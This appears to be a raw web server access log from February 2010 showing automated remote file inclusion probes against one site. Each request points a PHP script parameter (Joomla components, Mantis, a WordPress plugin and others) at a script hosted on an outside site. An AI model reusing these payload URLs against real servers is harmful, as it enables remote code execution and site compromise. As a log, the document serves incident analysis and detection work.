165.132.30.11 - - [20/Feb/2010:09:17:08 -0800] "GET /logs//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:08 -0800] "GET /logs/access_100124.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:08 -0800] "GET /default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:26 -0800] "GET /logs/access_100125.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:17:40 -0800] "GET /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:17:40 -0800] "GET /logs/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:17:40 -0800] "GET /logs/access_100115.log%20%20/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:42 -0800] "GET /default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:42 -0800] "GET /logs//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:17:42 -0800] "GET /logs/access_100124.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [20/Feb/2010:09:18:07 -0800] "GET /logs/access_100125.log%20%20//default/theme.php?THEME_DIR=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:09:18:10 -0800] "GET /logs/errors.php?error=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:09:18:10 -0800] "GET /errors.php?error=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:09:18:10 -0800] "GET /logs/errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
88.171.180.4 - - [20/Feb/2010:09:18:10 -0800] "GET /errors.php?error=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:51 -0800] "GET /include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:53 -0800] "GET /logs//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:55 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:56 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:56 -0800] "GET /logs//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:18:58 -0800] "GET /include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:19:03 -0800] "GET /displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:19:03 -0800] "GET /logs/access_100210.log%20%20//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:19:03 -0800] "GET /logs//displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:15 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:15 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:15 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:21 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:21 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:22 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:40 -0800] "GET /logs//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:40 -0800] "GET /logs/access_100125.log%20%20//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:40 -0800] "GET /default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:40 -0800] "GET /logs/access_100124.log%20%20//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:19:40 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:19:40 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:19:40 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:42 -0800] "GET /logs/access_100126.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:19:48 -0800] "GET /logs/access_100126.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:49 -0800] "GET /logs//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:49 -0800] "GET /default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:49 -0800] "GET /logs/access_100125.log%20%20//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [20/Feb/2010:09:19:49 -0800] "GET /logs/access_100124.log%20%20//default/theme.php?THEME_DIR=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:19:59 -0800] "GET /logs/access_100126.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:20:01 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:20:01 -0800] "GET /logs//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:20:06 -0800] "GET /include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:20:32 -0800] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:20:32 -0800] "GET /mantis/login_page.php?g_meta_include_file=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:20:37 -0800] "GET /logs/access_100118.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:11 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:11 -0800] "GET /logs/access_100116.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:11 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:18 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:18 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:18 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:21:18 -0800] "GET /logs/access_100117.log%20%20/mantis/login_page.php?g_meta_include_file=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:21:52 -0800] "GET /logs/access_100117.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:30 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:30 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:30 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:22:33 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:22:33 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:22:33 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [20/Feb/2010:09:22:39 -0800] "GET /logs/access_100118.log/mantis/login_page.php?g_meta_include_file=http://www.jeonju1318.or.kr/bbs//data2/respon1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.40.224.168 - - [20/Feb/2010:09:22:48 -0800] "GET /logs/access_100115.log%20%20//include.php?path[docroot]=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.158.248.83 - - [20/Feb/2010:09:22:51 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:58 -0800] "GET /logs/access_100116.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:58 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:22:58 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:16 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:16 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:16 -0800] "GET /logs/access_100123.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:22 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:22 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:23:22 -0800] "GET /logs/access_100123.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:23:23 -0800] "GET /logs/access_100114.log%20%20/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:23:31 -0800] "GET /logs/access_100120.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:23:32 -0800] "GET /logs/access_100117.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:23:52 -0800] "GET /logs/access_100120.log%20%20//admin/common.inc.php?base_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:24:29 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:24:29 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:24:29 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:24:33 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:24:33 -0800] "GET /logs/access_100114.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:24:33 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:24:46 -0800] "GET /logs/access_100114.log%20%20/ask_password.php?dir=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:25:12 -0800] "GET /logs/access_100116.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:25:12 -0800] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:25:12 -0800] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:25:28 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:25:31 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:25:31 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [20/Feb/2010:09:25:32 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.ajdgroup.fr/administrator/components/com_languages/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [20/Feb/2010:09:25:40 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:25:44 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:25:44 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.198.139 - - [20/Feb/2010:09:25:44 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:25:58 -0800] "GET /logs/access_100117.log%20%20/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [20/Feb/2010:09:27:04 -0800] "GET /logs/access_100127.log//errors.php?error=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:27:35 -0800] "GET /logs/access_100114.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hetweeshuis.nl/components/com_puter/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [20/Feb/2010:09:27:52 -0800] "GET /displayCategory.php?basepath=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
